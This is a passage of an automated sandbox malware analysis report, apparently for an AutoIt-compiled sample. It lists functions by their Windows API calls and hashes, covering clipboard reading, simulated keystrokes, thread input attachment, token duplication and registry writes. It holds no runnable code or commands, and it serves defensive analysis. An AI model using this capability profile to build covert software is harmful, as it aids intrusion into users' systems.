                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction ID: ba14ea62f5dd582cf78709fe8bab8ebd68a37fbdcadb8125a7de912d72f7466e
                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                            • Instruction Fuzzy Hash: 5FB0927684020C77DF012E82EC03F593B1A9B60679F808020FB0C18162A673E6A09689
                                                            Function 0020D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 0020D46A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 235cb31bb956e988e16943fce137cbc815898ee8dadab07ae8ab0c14b8116cbe
                                                            • Instruction ID: 198e20a10c8202f041231cd5478bbf60caa6a6979ddd054e236a8ed1ff48f04b
                                                            • Opcode Fuzzy Hash: 235cb31bb956e988e16943fce137cbc815898ee8dadab07ae8ab0c14b8116cbe
                                                            • Instruction Fuzzy Hash: 5B7172342193028FC714EF64C4D1A6EB7E5AF99314F04496DF8968B2E2DB30ED59CB52
                                                            Function 001C0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 204ddb969aac78c9870546c316a7ecd7acdde3b3dc32cc6a6fcd47c4e4210109
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: 7631C471A40105DFC71ADF58D480A69F7A6FF6D300B658AA9E409CB651D731EEC1CBC0
                                                            Function 034D22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 034D22B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701993742.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_34d0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: 071241f6d79be28b38f2155db14cd08856d6abcea90227d66870a1b6353381da
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: F4E0E67494010EDFDB00EFB8D64969E7FB4EF04301F1005A1FD01D2280D6709D509A72

                                                            Non-executed Functions

                                                            Function 0022CDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0022CE50
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0022CE91
                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0022CED6
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0022CF00
                                                            • SendMessageW.USER32 ref: 0022CF29
                                                            • _wcsncpy.LIBCMT ref: 0022CFA1
                                                            • GetKeyState.USER32(00000011), ref: 0022CFC2
                                                            • GetKeyState.USER32(00000009), ref: 0022CFCF
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0022CFE5
                                                            • GetKeyState.USER32(00000010), ref: 0022CFEF
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0022D018
                                                            • SendMessageW.USER32 ref: 0022D03F
                                                            • SendMessageW.USER32(?,00001030,?,0022B602), ref: 0022D145
                                                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0022D15B
                                                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0022D16E
                                                            • SetCapture.USER32(?), ref: 0022D177
                                                            • ClientToScreen.USER32(?,?), ref: 0022D1DC
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0022D1E9
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0022D203
                                                            • ReleaseCapture.USER32 ref: 0022D20E
                                                            • GetCursorPos.USER32(?), ref: 0022D248
                                                            • ScreenToClient.USER32(?,?), ref: 0022D255
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0022D2B1
                                                            • SendMessageW.USER32 ref: 0022D2DF
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0022D31C
                                                            • SendMessageW.USER32 ref: 0022D34B
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0022D36C
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0022D37B
                                                            • GetCursorPos.USER32(?), ref: 0022D39B
                                                            • ScreenToClient.USER32(?,?), ref: 0022D3A8
                                                            • GetParent.USER32(?), ref: 0022D3C8
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0022D431
                                                            • SendMessageW.USER32 ref: 0022D462
                                                            • ClientToScreen.USER32(?,?), ref: 0022D4C0
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0022D4F0
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0022D51A
                                                            • SendMessageW.USER32 ref: 0022D53D
                                                            • ClientToScreen.USER32(?,?), ref: 0022D58F
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0022D5C3
                                                              • Part of subcall function 001A25DB: GetWindowLongW.USER32(?,000000EB), ref: 001A25EC
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0022D65F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F$pr&
                                                            • API String ID: 3977979337-2594466917
                                                            • Opcode ID: b7a323f589dee4093fd00d8aa14b4d10a731838e191e954b98ffca83c57d2cef
                                                            • Instruction ID: 54b53e531f4453cc93e3945a90aa417388529935b5e98914717757263b482f31
                                                            • Opcode Fuzzy Hash: b7a323f589dee4093fd00d8aa14b4d10a731838e191e954b98ffca83c57d2cef
                                                            • Instruction Fuzzy Hash: D742BF34214252BFD721CFA8E848FAABBF9FF49314F24052DF655872A0C7719865CB92
                                                            Function 0022804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0022873F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 3850602802-328681919
                                                            • Opcode ID: 39a69eb75fe6d8338510f52dcdb1909d99a6065ef24113dc8d3ed506109737d4
                                                            • Instruction ID: c6da2b86e589e998ab3b0df2ce8b4b5bf0b22b02ef6f6d70bf2b6cbf260c704f
                                                            • Opcode Fuzzy Hash: 39a69eb75fe6d8338510f52dcdb1909d99a6065ef24113dc8d3ed506109737d4
                                                            • Instruction Fuzzy Hash: 6612E071511225BBEB258FA4EC49FAE7BB8EF49310F204129F915EA2E1DFB0C951CB50
                                                            Function 001B710E Relevance: 50.6, APIs: 19, Strings: 7, Instructions: 5093COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_memset
                                                            • String ID: 0w%$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                            • API String ID: 1357608183-792763389
                                                            • Opcode ID: 728edeb418e56b97866d8d402b5656c4e2fbbf02668a9a043020c98f7ab16d7d
                                                            • Instruction ID: 61d1139951bb60ef31ad1687e3a4d3c3867dd499d2bbe94c593718391c6c9a7c
                                                            • Opcode Fuzzy Hash: 728edeb418e56b97866d8d402b5656c4e2fbbf02668a9a043020c98f7ab16d7d
                                                            • Instruction Fuzzy Hash: 24939271A04219DBDB28CF58C891BFDB7B1FF48710F25816AEA55EB290E7709E81CB50
                                                            Function 001A4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,?), ref: 001A4A3D
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001DDA8E
                                                            • IsIconic.USER32(?), ref: 001DDA97
                                                            • ShowWindow.USER32(?,00000009), ref: 001DDAA4
                                                            • SetForegroundWindow.USER32(?), ref: 001DDAAE
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001DDAC4
                                                            • GetCurrentThreadId.KERNEL32 ref: 001DDACB
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 001DDAD7
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 001DDAE8
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 001DDAF0
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 001DDAF8
                                                            • SetForegroundWindow.USER32(?), ref: 001DDAFB
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 001DDB10
                                                            • keybd_event.USER32(00000012,00000000), ref: 001DDB1B
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 001DDB25
                                                            • keybd_event.USER32(00000012,00000000), ref: 001DDB2A
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 001DDB33
                                                            • keybd_event.USER32(00000012,00000000), ref: 001DDB38
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 001DDB42
                                                            • keybd_event.USER32(00000012,00000000), ref: 001DDB47
                                                            • SetForegroundWindow.USER32(?), ref: 001DDB4A
                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 001DDB71
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: b336ef775780f6927d49a55a3fc0589c75d3d919cd85fa0a9f432a69100afdbf
                                                            • Instruction ID: 7adb413cff6036cc4dbba87481ef2236f292ff977254fb6fce530685916558e6
                                                            • Opcode Fuzzy Hash: b336ef775780f6927d49a55a3fc0589c75d3d919cd85fa0a9f432a69100afdbf
                                                            • Instruction Fuzzy Hash: 32315271A40318BFEB316FA1AD4AF7F7E7CEB44B50F114036FA04AA1D0D6B45911AAA1
                                                            Function 001F8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001F8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001F8D0D
                                                              • Part of subcall function 001F8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001F8D3A
                                                              • Part of subcall function 001F8CC3: GetLastError.KERNEL32 ref: 001F8D47
                                                            • _memset.LIBCMT ref: 001F889B
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001F88ED
                                                            • CloseHandle.KERNEL32(?), ref: 001F88FE
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001F8915
                                                            • GetProcessWindowStation.USER32 ref: 001F892E
                                                            • SetProcessWindowStation.USER32(00000000), ref: 001F8938
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 001F8952
                                                              • Part of subcall function 001F8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001F8851), ref: 001F8728
                                                              • Part of subcall function 001F8713: CloseHandle.KERNEL32(?,?,001F8851), ref: 001F873A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                            • String ID: $default$winsta0
                                                            • API String ID: 2063423040-1027155976
                                                            • Opcode ID: 12cfe7ba17eaeb3fc2c389d170cbcc3e7a362c308ab1bc5f81fd9251f4f26530
                                                            • Instruction ID: 9a17e9ab0b59be2ad97a52f943efa7f1efcb95fbc8ed5640db8850ddf04234e2
                                                            • Opcode Fuzzy Hash: 12cfe7ba17eaeb3fc2c389d170cbcc3e7a362c308ab1bc5f81fd9251f4f26530
                                                            • Instruction Fuzzy Hash: A681277191020DBFDF21DFA4DD49AFEBBB8EF14304F18416AFA20A7161DB318A559B60
                                                            Function 0021425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenClipboard.USER32(0022F910), ref: 00214284
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00214292
                                                            • GetClipboardData.USER32(0000000D), ref: 0021429A
                                                            • CloseClipboard.USER32 ref: 002142A6
                                                            • GlobalLock.KERNEL32(00000000), ref: 002142C2
                                                            • CloseClipboard.USER32 ref: 002142CC
                                                            • GlobalUnlock.KERNEL32(00000000,00000000), ref: 002142E1
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 002142EE
                                                            • GetClipboardData.USER32(00000001), ref: 002142F6
                                                            • GlobalLock.KERNEL32(00000000), ref: 00214303
                                                            • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00214337
                                                            • CloseClipboard.USER32 ref: 00214447
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                            • String ID:
                                                            • API String ID: 3222323430-0
                                                            • Opcode ID: 86e9d8e77240088c919d94a8050b41d48e113d19a40cb6d107aa5d9fe95c2c54
                                                            • Instruction ID: d680ad15a2454d8f2d9eaed6c5ad2ac1c8566731bc75d9e57b7ed789c3b96969
                                                            • Opcode Fuzzy Hash: 86e9d8e77240088c919d94a8050b41d48e113d19a40cb6d107aa5d9fe95c2c54
                                                            • Instruction Fuzzy Hash: A851B335204202ABD321FFA0ED89FBE77B8AFA5B00F104539F959D31A1DB70D9458B62
                                                            Function 0020C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0020C9F8
                                                            • FindClose.KERNEL32(00000000), ref: 0020CA4C
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0020CA71
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0020CA88
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0020CAAF
                                                            • __swprintf.LIBCMT ref: 0020CAFB
                                                            • __swprintf.LIBCMT ref: 0020CB3E
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                            • __swprintf.LIBCMT ref: 0020CB92
                                                              • Part of subcall function 001C38D8: __woutput_l.LIBCMT ref: 001C3931
                                                            • __swprintf.LIBCMT ref: 0020CBE0
                                                              • Part of subcall function 001C38D8: __flsbuf.LIBCMT ref: 001C3953
                                                              • Part of subcall function 001C38D8: __flsbuf.LIBCMT ref: 001C396B
                                                            • __swprintf.LIBCMT ref: 0020CC2F
                                                            • __swprintf.LIBCMT ref: 0020CC7E
                                                            • __swprintf.LIBCMT ref: 0020CCCD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 3953360268-2428617273
                                                            • Opcode ID: d19ad0405055d66076d437c9fcfa34bec803ee54580420dfa01c64ca4e860f55
                                                            • Instruction ID: f36f108bdc774d943bab970b97a6791a7b22f00e6b5fbd2c5e2faea66b022e29
                                                            • Opcode Fuzzy Hash: d19ad0405055d66076d437c9fcfa34bec803ee54580420dfa01c64ca4e860f55
                                                            • Instruction Fuzzy Hash: A9A14EB5518305ABC710EFA0C986DAFB7ECFFA5700F404929B595C3192EB34DA48CB62
                                                            Function 0020F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0020F221
                                                            • _wcscmp.LIBCMT ref: 0020F236
                                                            • _wcscmp.LIBCMT ref: 0020F24D
                                                            • GetFileAttributesW.KERNEL32(?), ref: 0020F25F
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 0020F279
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0020F291
                                                            • FindClose.KERNEL32(00000000), ref: 0020F29C
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0020F2B8
                                                            • _wcscmp.LIBCMT ref: 0020F2DF
                                                            • _wcscmp.LIBCMT ref: 0020F2F6
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0020F308
                                                            • SetCurrentDirectoryW.KERNEL32(0025A5A0), ref: 0020F326
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0020F330
                                                            • FindClose.KERNEL32(00000000), ref: 0020F33D
                                                            • FindClose.KERNEL32(00000000), ref: 0020F34F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            • Opcode ID: 9cc6178a33132c378601738c733d5fd7aae2e00d1914d54d9c211f4ee027fb24
                                                            • Instruction ID: 87835afd4020ad36041b2068b027bf41282be42d3a44f4fee80631975d38aa9e
                                                            • Opcode Fuzzy Hash: 9cc6178a33132c378601738c733d5fd7aae2e00d1914d54d9c211f4ee027fb24
                                                            • Instruction Fuzzy Hash: 0531D03655035ABECBA0DFA0ED49EDE73ACAF09321F1042B5E810E30E1EB30DA558A54
                                                            Function 00220AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00220BDE
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0022F910,00000000,?,00000000,?,?), ref: 00220C4C
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00220C94
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00220D1D
                                                            • RegCloseKey.ADVAPI32(?), ref: 0022103D
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0022104A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            • Opcode ID: 04465f4ced372fb1bdc7ef55f3e5537afb5aa8a1220e20dab9b6cf9f2909b577
                                                            • Instruction ID: 58cbfbbcd3da65045732f4d492cbf4a6187939d9337d8fb320c6f0037535d939
                                                            • Opcode Fuzzy Hash: 04465f4ced372fb1bdc7ef55f3e5537afb5aa8a1220e20dab9b6cf9f2909b577
                                                            • Instruction Fuzzy Hash: 39028D79210611AFCB14EF64D885E2AB7E5FF99714F04885DF88A9B362CB30ED51CB81
                                                            Function 0020F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0020F37E
                                                            • _wcscmp.LIBCMT ref: 0020F393
